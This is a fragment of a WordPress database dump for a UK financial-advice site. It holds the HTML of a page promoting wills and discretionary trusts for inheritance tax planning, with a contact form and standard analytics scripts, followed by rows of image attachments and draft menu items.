Trust</a>\r\n\r\nremain an important estate planning mechanism for us all</td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"154\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"5\" valign=\"top\"></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"71\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"108\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"24\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"58\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" valign=\"top\"></td>\r\n<td></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"24\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"17\"><img id=\"investments_r14_c1\" src=\"/images/investments_r14_c1.jpg\" alt=\"\" width=\"950\" height=\"8\" name=\"investments_r14_c1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"8\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"2\"><img id=\"investments_r15_c1\" src=\"/images/investments_r15_c1.jpg\" alt=\"\" width=\"10\" height=\"245\" name=\"investments_r15_c1\" border=\"0\" /></td>\r\n<td rowspan=\"2\"><img id=\"investments_r15_c2\" src=\"/images/investments_r15_c2.jpg\" alt=\"\" width=\"18\" height=\"245\" name=\"investments_r15_c2\" border=\"0\" /></td>\r\n<td colspan=\"10\">\r\n<h2>more information on Wills and Trust ...</h2>\r\n</td>\r\n<td rowspan=\"2\"><img id=\"investments_r15_c13\" src=\"/images/investments_r15_c13.jpg\" alt=\"\" width=\"11\" height=\"245\" name=\"investments_r15_c13\" border=\"0\" /></td>\r\n<td colspan=\"3\">\r\n<div class=\"moreinfo\">Contact Us for Advice</div></td>\r\n<td rowspan=\"2\"><img id=\"investments_r15_c17\" src=\"/images/investments_r15_c17.jpg\" alt=\"\" width=\"19\" height=\"245\" name=\"investments_r15_c17\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"54\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"10\" valign=\"top\">\r\n<div class=\"paracontent2\">\r\nSOME OF THE MAJOR BENEFITS OF DISCRETIONARY TRUST SCHEMES FOLLOW\r\n<ul>\r\n<ul>\r\n 	<li>\r\nAccess to Financial Funds by the Surviving Spouse</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul>\r\n<ul>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul>\r\n<ul>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul>\r\n<ul>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n</ul>\r\n</ul>\r\n\r\n<ul>\r\n<ul>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n</ul>\r\n\r\nOTHER IMPORTANT CONSIDERATIONS:\r\nUpon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care\r\n\r\n\r\n\r\n</div></td>\r\n<td colspan=\"3\" valign=\"top\">\r\n<div id=\"form\" class=\"form\" style=\"width: 310; height: 125px; text-align: right; font-size: 12px; color: #600000; font-weight: bold; margin-left: 6px;\">\r\n\r\n\r\n\r\n<form id=\"form\" action=\"../../thank-you/\" method=\"post\" name=\"form\">\r\n<table border=\"0\" width=\"280\" cellspacing=\"4\" cellpadding=\"1\" align=\"right\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: left;\" width=\"117\">First name:\r\n<input id=\"name\" style=\"border: thin solid #999;\" name=\"name\" size=\"15\" type=\"text\" /></td>\r\n<td style=\"text-align: left;\" width=\"168\">Surname:\r\n\r\n<input id=\"surname\" style=\"border: thin solid #999;\" name=\"surname\" size=\"17\" type=\"text\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\">Email:\r\n<input id=\"email\" style=\"border: thin solid #999;\" name=\"email\" size=\"15\" type=\"text\" /></td>\r\n<td style=\"text-align: left;\">Daytime Tel:\r\n<input id=\"telephone\" style=\"border: thin solid #999;\" name=\"telephone\" size=\"17\" type=\"text\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\">Evening Tel:\r\n<input id=\"telephone2\" style=\"border: thin solid #999;\" name=\"telephone2\" size=\"15\" type=\"text\" /></td>\r\n<td style=\"text-align: left;\">Postcode:\r\n<input id=\"postcode\" style=\"border: thin solid #999;\" name=\"postcode\" size=\"17\" type=\"text\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\">Date of Birth:\r\n<input id=\"dob\" style=\"border: thin solid #999;\" name=\"dob\" size=\"15\" type=\"text\" value=\"dd/mm/yy\" /></td>\r\n<td style=\"text-align: left;\">Intestested In?\r\n<select id=\"interested\" name=\"interested\">\r\n<option value=\"--\">--</option>\r\n<option value=\"asset\">Asset Trust</option>\r\n<option value=\"discretionery\">Discretionery</option>\r\n<option value=\"absolute\">Absolute Trust</option>\r\n<option value=\"business\">Business Protection</option>\r\n<option selected=\"selected\" value=\"wills\">Wills and Trust</option>\r\n</select></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\"></td>\r\n<td style=\"text-align: left;\"><label>\r\n<input id=\"submit\" alt=\"Savings &amp; Investments\" name=\"submit\" src=\"/images/submit.jpg\" type=\"image\" value=\"Submit\" align=\"right\" /></label></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\"></td>\r\n<td style=\"text-align: left;\"></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\" colspan=\"2\">\r\n<div style=\"padding: 5px; font-weight: normal; border: thin dotted #999;\">Note: The Financial Services Authority does not regulate some forms of tax advice, trusts &amp; wills</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n</form></div></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"191\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"17\"><img id=\"investments_r17_c1\" src=\"/images/investments_r17_c1.jpg\" alt=\"\" width=\"950\" height=\"6\" name=\"investments_r17_c1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"6\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"background-image: url(\'/images/index_r16_c1.jpg\'); background-repeat: no-repeat; color: #333;\" colspan=\"17\" valign=\"top\"></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"75\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<script type=\"text/javascript\"><![CDATA[ var gaJsHost = ((\"https:\" == document.location.protocol) ? \"https://ssl.\" : \"http://www.\"); document.write(unescape(\"%3Cscript src=\'\" + gaJsHost + \"google-analytics.com/ga.js\' type=\'text/javascript\'%3E%3C/script%3E\")); ]]></script><script type=\"text/javascript\"><![CDATA[ try { var pageTracker = _gat._getTracker(\"UA-10958181-3\"); pageTracker._trackPageview(); } catch(err) {}]]></script><script type=\"text/javascript\"><![CDATA[ var adiInit =\"488\"; (function() { var adiSrc = document.createElement(\"script\"); adiSrc.type = \"text/javascript\"; adiSrc.async = true; adiSrc.src = (\"https:\" == document.location.protocol ? \"https://\" : \"http://\") + \"static.adinsight.eu/static/scripts/adiTrack.min.js\"; var s = document.getElementsByTagName(\"script\")[0]; s.parentNode.insertBefore(adiSrc, s); })(); ]]></script>','Wills and Trust - Important Estate Planning Mechanism','Wills and Trusts remain an important estate planning mechanism for us all.  Call Equity SMART on 01272 225114 to get advice from one of our experts.','publish','closed','closed','','start-fundraising','','','2017-09-21 17:01:12','2017-09-21 17:01:12','',0,'http://www.equalitywalk.org.uk/wills-and-trust-important-estate-planning-mechanism',0,'page','',0),(122,1,'2017-09-21 16:36:07','2017-09-21 16:36:07','','dontwait-dont-wait','','inherit','open','closed','','dontwait-dont-wait','','','2017-09-21 16:36:07','2017-09-21 16:36:07','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/dontwait-dont-wait.jpg',0,'attachment','image/jpeg',0),(123,1,'2017-09-21 16:36:09','2017-09-21 16:36:09','','brain','','inherit','open','closed','','brain','','','2017-09-21 16:36:09','2017-09-21 16:36:09','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/brain.jpg',0,'attachment','image/jpeg',0),(124,1,'2017-09-21 16:36:11','2017-09-21 16:36:11','','7-signs-nervous-breakdown-never-ignore-featured','','inherit','open','closed','','7-signs-nervous-breakdown-never-ignore-featured','','','2017-09-21 16:36:11','2017-09-21 16:36:11','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/7-signs-nervous-breakdown-never-ignore-featured.jpg',0,'attachment','image/jpeg',0),(125,1,'2017-09-21 16:36:13','2017-09-21 16:36:13','','HIPPOCAMPUS','','inherit','open','closed','','hippocampus','','','2017-09-21 16:36:13','2017-09-21 16:36:13','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/HIPPOCAMPUS.png',0,'attachment','image/png',0),(126,1,'2017-09-21 16:36:17','2017-09-21 16:36:17','','beb5b9aa-8887-42e3-90b3-ea7ec43e1076_1.028ddfd002680519f3a4259d39ffa2c3','','inherit','open','closed','','beb5b9aa-8887-42e3-90b3-ea7ec43e1076_1-028ddfd002680519f3a4259d39ffa2c3','','','2017-09-21 16:36:17','2017-09-21 16:36:17','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/beb5b9aa-8887-42e3-90b3-ea7ec43e1076_1.028ddfd002680519f3a4259d39ffa2c3.jpeg',0,'attachment','image/jpeg',0),(127,1,'2017-09-21 16:36:21','2017-09-21 16:36:21','','img27','','inherit','open','closed','','img27','','','2017-09-21 16:36:21','2017-09-21 16:36:21','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/img27.jpg',0,'attachment','image/jpeg',0),(128,1,'2017-09-21 16:36:29','2017-09-21 16:36:29','','13100-TEU-Class-HANJIN-SOOHO','','inherit','open','closed','','13100-teu-class-hanjin-sooho','','','2017-09-21 16:36:29','2017-09-21 16:36:29','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/13100-TEU-Class-HANJIN-SOOHO.jpg',0,'attachment','image/jpeg',0),(129,1,'2017-09-21 16:36:31','2017-09-21 16:36:31','','6931','','inherit','open','closed','','6931','','','2017-09-21 16:36:31','2017-09-21 16:36:31','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/6931.jpg',0,'attachment','image/jpeg',0),(130,1,'2017-09-21 16:36:35','2017-09-21 16:36:35','','entrega','','inherit','open','closed','','entrega','','','2017-09-21 16:36:35','2017-09-21 16:36:35','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/entrega.jpg',0,'attachment','image/jpeg',0),(131,1,'2017-09-21 16:36:43','0000-00-00 00:00:00','','Home','','draft','closed','closed','','','','','2017-09-21 16:36:43','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=131',1,'nav_menu_item','',0),(132,1,'2017-09-21 16:36:43','0000-00-00 00:00:00','','5 Powerful Reasons To Review Your Critical illness Insurance','','draft','closed','closed','','','','','2017-09-21 16:36:43','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=132',1,'nav_menu_item','',0),(133,1,'2017-09-21 16:36:43','2017-09-21 16:36:43','','Man having a parcel delivered','','inherit','open','closed','','man-having-a-parcel-delivered','','','2017-09-21 16:36:43','2017-09-21 16:36:43','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/Man-having-a-parcel-deliv-014.jpg',0,'attachment','image/jpeg',0),(134,1,'2017-09-21 16:36:44','0000-00-00 00:00:00','','A Guide To Auto Enrolment','','draft','closed','closed','','','','','2017-09-21 16:36:44','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=134',1,'nav_menu_item','',0),(135,1,'2017-09-21 16:36:44','0000-00-00 00:00:00','','Approaching Retirement?','','draft','closed','closed','','','','','2017-09-21 16:36:44','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=135',1,'nav_menu_item','',0),(136,1,'2017-09-21 16:36:45','0000-00-00 00:00:00','','April 2014 Stock Market Bulletin','','draft','closed','closed','','','','','2017-09-21 16:36:45','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=136',1,'nav_menu_item','',0),(137,1,'2017-09-21 16:36:45','0000-00-00 00:00:00','','Asset Protection Trust','','draft','closed','closed','','','','','2017-09-21 16:36:45','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=137',1,'nav_menu_item','',0),(138,1,'2017-09-21 16:36:45','0000-00-00 00:00:00','','Budget Report 2014','','draft','closed','closed','','','','','2017-09-21 16:36:45','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=138',1,'nav_menu_item','',0),(139,1,'2017-09-21 16:36:45','0000-00-00 00:00:00','','Business Protection','','draft','closed','closed','','','','','2017-09-21 16:36:45','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=139',1,'nav_menu_item','',0),(140,1,'2017-09-21 16:36:46','0000-00-00 00:00:00','','Can I Sell My Pension Under 55?','','draft','closed','closed','','','','','2017-09-21 16:36:46','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=140',1,'nav_menu_item','',0),(141,1,'2017-09-21 16:36:46','0000-00-00 00:00:00','','Critical Illness Guide','','draft','closed','closed','','','','','2017-09-21 16:36:46','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=141',1,'nav_menu_item','',0),(142,1,'2017-09-21 16:36:46','0000-00-00 00:00:00','','eSmart Money January/February 2014 issue','','draft','closed','closed','','','','','2017-09-21 16:36:46','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=142',1,'nav_menu_item','',0),(143,1,'2017-09-21 16:36:46','0000-00-00 00:00:00','','Financial Planning for Divorcees','','draft','closed','closed','','','','','2017-09-21 16:36:46','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=143',1,'nav_menu_item','',0),(144,1,'2017-09-21 16:36:47','0000-00-00 00:00:00','','G-day - Impact of the Gender Directive on Insurance','','draft','closed','closed','','','','','2017-09-21 16:36:47','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=144',1,'nav_menu_item','',0),(145,1,'2017-09-21 16:36:47','0000-00-00 00:00:00','','Has Your Bank Left You Stranded Without a Financial Adviser','','draft','closed','closed','','','','','2017-09-21 16:36:47','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=145',1,'nav_menu_item','',0),(146,1,'2017-09-21 16:36:47','0000-00-00 00:00:00','','How Annuities Have Changed Since The Budget','','draft','closed','closed','','','','','2017-09-21 16:36:47','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=146',1,'nav_menu_item','',0),(147,1,'2017-09-21 16:36:48','0000-00-00 00:00:00','','How much Money can I get out of my Pension?','','draft','closed','closed','','','','','2017-09-21 16:36:48','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=147',1,'nav_menu_item','',0),(148,1,'2017-09-21 16:36:49','0000-00-00 00:00:00','','How To Get The Most From Auto-Enrolment','','draft','closed','closed','','','','','2017-09-21 16:36:49','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=148',1,'nav_menu_item','',0),(149,1,'2017-09-21 16:36:49','0000-00-00 00:00:00','','Life Insurance','','draft','closed','closed','','','','','2017-09-21 16:36:49','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=149',1,'nav_menu_item','',0),(150,1,'2017-09-21 16:36:50','0000-00-00 00:00:00','','Make the Most of Your ISA Allowance – Before it’s Too Late','','draft','closed','closed','','','','','2017-09-21 16:36:50','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=150',1,'nav_menu_item','',0),(151,1,'2017-09-21 16:36:50','0000-00-00 00:00:00','','May 2014 Stock Market Bulletin','','draft','closed','closed','','','','','2017-09-21 16:36:50','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=151',1,'nav_menu_item','',0),(152,1,'2017-09-21 16:36:50','0000-00-00 00:00:00','','Mortgage Strategic Alliance','','draft','closed','closed','','','','','2017-09-21 16:36:50','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=152',1,'nav_menu_item','',0),(153,1,'2017-09-21 16:36:51','0000-00-00 00:00:00','','Pension Liberation – Good plan or bad scam?','','draft','closed','closed','','','','','2017-09-21 16:36:51','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=153',1,'nav_menu_item','',0),(154,1,'2017-09-21 16:36:51','0000-00-00 00:00:00','','Pension Reforms Offer Freedom to Savers','','draft','closed','closed','','','','','2017-09-21 16:36:51','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=154',1,'nav_menu_item','',0),(155,1,'2017-09-21 16:36:51','0000-00-00 00:00:00','','Pension Review','','draft','closed','closed','','','','','2017-09-21 16:36:51','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=155',1,'nav_menu_item','',0),(156,1,'2017-09-21 16:36:51','0000-00-00 00:00:00','','Smart Money: Nov-Dec','','draft','closed','closed','','','','','2017-09-21 16:36:51','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=156',1,'nav_menu_item','',0),(157,1,'2017-09-21 16:36:52','0000-00-00 00:00:00','','Stock Market Bulletin - March 2014','','draft','closed','closed','','','','','2017-09-21 16:36:52','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=157',1,'nav_menu_item','',0),(158,1,'2017-09-21 16:36:52','0000-00-00 00:00:00','','The New Individual Savings Accounts','','draft','closed','closed','','','','','2017-09-21 16:36:52','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=158',1,'nav_menu_item','',0),(159,1,'2017-09-21 16:36:53','0000-00-00 00:00:00','','The New Individual Savings Accounts -- Q&A','','draft','closed','closed','','','','','2017-09-21 16:36:53','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=159',1,'nav_menu_item','',0),(160,1,'2017-09-21 16:36:53','2017-09-21 16:36:53','','2','','inherit','open','closed','','2','','','2017-09-21 16:36:53','2017-09-21 16:36:53','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/2.jpg',0,'attachment','image/jpeg',0),(161,1,'2017-09-21 16:36:54','0000-00-00 00:00:00','','The Seven Deadly Investment Sins','','draft','closed','closed','','','','','2017-09-21 16:36:54','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=161',1,'nav_menu_item','',0),(162,1,'2017-09-21 16:36:54','0000-00-00 00:00:00','','Wealth Management','','draft','closed','closed','','','','','2017-09-21 16:36:54','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=162',1,'nav_menu_item','',0),(163,1,'2017-09-21 16:36:54','0000-00-00 00:00:00','','What Are The Best Annuity Rates in The UK','','draft','closed','closed','','','','','2017-09-21 16:36:54','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=163',1,'nav_menu_item','',0),(164,1,'2017-09-21 16:36:55','0000-00-00 00:00:00','','What is Automatic Enrolment','','draft','closed','closed','','','','','2017-09-21 16:36:55','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=164',1,'nav_menu_item','',0),(165,1,'2017-09-21 16:36:55','0000-00-00 00:00:00','','When is your Staging Date Social Advisors','','draft','closed','closed','','','','','2017-09-21 16:36:55','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=165',1,'nav_menu_item','',0),(166,1,'2017-09-21 16:36:55','0000-00-00 00:00:00','','Which is Better Pension Drawdown or Annuity?','','draft','closed','closed','','','','','2017-09-21 16:36:55','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=166',1,'nav_menu_item','',0),(167,1,'2017-09-21 16:36:55','0000-00-00 00:00:00','','Whole of life insurance - an advisers tale','','draft','closed','closed','','','','','2017-09-21 16:36:55','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=167',1,'nav_menu_item','',0),(168,1,'2017-09-21 16:36:56','0000-00-00 00:00:00','','Will You Avoid Care Home Costs and Fees?','','draft','closed','closed','','','','','2017-09-21 16:36:56','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=168',1,'nav_menu_item','',0),(169,1,'2017-09-21 16:36:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:36:56','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=169',1,'nav_menu_item','',0),(170,1,'2017-09-21 16:36:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:36:56','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=170',1,'nav_menu_item','',0),(171,1,'2017-09-21 16:36:57','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:36:57','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=171',1,'nav_menu_item','',0),(172,1,'2017-09-21 16:36:57','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:36:57','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=172',1,'nav_menu_item','',0),(173,1,'2017-09-21 16:36:58','0000-00-00 00:00:00','','Auto Enrolment Pensions Advice, Information & FREE Report','','draft','closed','closed','','','','','2017-09-21 16:36:58','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=173',1,'nav_menu_item','',0),(174,1,'2017-09-21 16:36:58','2017-09-21 16:36:58','','nfive-uk-3','','inherit','open','closed','','nfive-uk-3','','','2017-09-21 16:36:58','2017-09-21 16:36:58','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/nfive-uk-3.jpeg',0,'attachment','image/jpeg',0),(175,1,'2017-09-21 16:36:58','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:36:58','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=175',1,'nav_menu_item','',0),(176,1,'2017-09-21 16:36:59','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:36:59','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=176',1,'nav_menu_item','',0),(177,1,'2017-09-21 16:36:59','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:36:59','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=177',1,'nav_menu_item','',0),(178,1,'2017-09-21 16:36:59','0000-00-00 00:00:00','','Discretionary Trusts and Trustee\'s','','draft','closed','closed','','','','','2017-09-21 16:36:59','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=178',1,'nav_menu_item','',0),(179,1,'2017-09-21 16:37:00','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:37:00','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=179',1,'nav_menu_item','',0),(180,1,'2017-09-21 16:37:00','0000-00-00 00:00:00','','Gift & Loan Trust | Loan Schemes','','draft','closed','closed','','','','','2017-09-21 16:37:00','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=180',1,'nav_menu_item','',0),(181,1,'2017-09-21 16:37:00','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:37:00','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=181',1,'nav_menu_item','',0),(182,1,'2017-09-21 16:37:01','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:37:01','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=182',1,'nav_menu_item','',0),(183,1,'2017-09-21 16:37:01','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:37:01','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=183',1,'nav_menu_item','',0),(184,1,'2017-09-21 16:37:01','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-09-21 16:37:01','0000-00-00 00:00:00','',0,'http://www.equalitywalk.org.uk/?p=184',1,'nav_menu_item','',0),(185,1,'2017-09-21 16:37:11','2017-09-21 16:37:11',' ','Wills and Trust','','publish','closed','closed','','wills-and-trust-important-estate-planning-mechanism','','','2017-09-21 17:26:21','2017-09-21 17:26:21','',0,'http://www.equalitywalk.org.uk/?p=185',2,'nav_menu_item','',0),(186,1,'2017-09-21 16:37:02','2017-09-21 16:37:02','','69003322uneek-group-INTERNATIONAL-COURIERS-home-2','','inherit','open','closed','','69003322uneek-group-international-couriers-home-2','','','2017-09-21 16:37:02','2017-09-21 16:37:02','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/69003322uneek-group-INTERNATIONAL-COURIERS-home-2.jpg',0,'attachment','image/jpeg',0),(187,1,'2017-09-21 16:37:12','2017-09-21 16:37:12',' ','Wills','','publish','closed','closed','','187','','','2017-09-21 17:26:21','2017-09-21 17:26:21','',0,'http://www.equalitywalk.org.uk/?p=187',3,'nav_menu_item','',0),(188,1,'2017-09-21 16:37:12','2017-09-21 16:37:12','','Care Home Costs','','publish','closed','closed','','will-you-avoid-care-home-costs-and-fees','','','2017-09-21 17:26:21','2017-09-21 17:26:21','',0,'http://www.equalitywalk.org.uk/?p=188',4,'nav_menu_item','',0),(189,1,'2017-09-21 16:37:12','2017-09-21 16:37:12','','Life insurance','','publish','closed','closed','','whole-of-life-insurance-an-advisers-tale','','','2017-09-21 17:26:21','2017-09-21 17:26:21','',0,'http://www.equalitywalk.org.uk/?p=189',5,'nav_menu_item','',0),(190,1,'2017-09-21 16:37:04','2017-09-21 16:37:04','','abt-img','','inherit','open','closed','','abt-img','','','2017-09-21 16:37:04','2017-09-21 16:37:04','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/abt-img.png',0,'attachment','image/png',0),(191,1,'2017-09-21 16:37:07','2017-09-21 16:37:07','','slide_1','','inherit','open','closed','','slide_1','','','2017-09-21 16:37:07','2017-09-21 16:37:07','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/slide_1.jpg',0,'attachment','image/jpeg',0),(192,1,'2017-09-21 16:37:10','2017-09-21 16:37:10','','courierservices','','inherit','open','closed','','courierservices','','','2017-09-21 16:37:10','2017-09-21 16:37:10','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/courierservices.jpg',0,'attachment','image/jpeg',0),(193,1,'2017-09-21 16:37:13','2017-09-21 16:37:13','','international-courier','','inherit','open','closed','','international-courier','','','2017-09-21 16:37:13','2017-09-21 16:37:13','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/international-courier.jpg',0,'attachment','image/jpeg',0),(194,1,'2017-09-21 16:37:15','2017-09-21 16:37:15','','banner22','','inherit','open','closed','','banner22','','','2017-09-21 16:37:15','2017-09-21 16:37:15','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/banner22.jpg',0,'attachment','image/jpeg',0),(195,1,'2017-09-21 16:37:19','2017-09-21 16:37:19','','slide2','','inherit','open','closed','','slide2','','','2017-09-21 16:37:19','2017-09-21 16:37:19','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/slide2.jpg',0,'attachment','image/jpeg',0),(196,1,'2017-09-21 16:37:21','2017-09-21 16:37:21','','uk','','inherit','open','closed','','uk','','','2017-09-21 16:37:21','2017-09-21 16:37:21','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/uk.jpg',0,'attachment','image/jpeg',0),(197,1,'2017-09-21 16:37:25','2017-09-21 16:37:25','','8912aircagoabout-bg','','inherit','open','closed','','8912aircagoabout-bg','','','2017-09-21 16:37:25','2017-09-21 16:37:25','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/8912aircagoabout-bg.jpg',0,'attachment','image/jpeg',0),(198,1,'2017-09-21 16:37:39','2017-09-21 16:37:39','','courier-services-london','','inherit','open','closed','','courier-services-london','','','2017-09-21 16:37:39','2017-09-21 16:37:39','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/courier-services-london.jpg',0,'attachment','image/jpeg',0),(199,1,'2017-09-21 16:37:52','2017-09-21 16:37:52','','global','','inherit','open','closed','','global','','','2017-09-21 16:37:52','2017-09-21 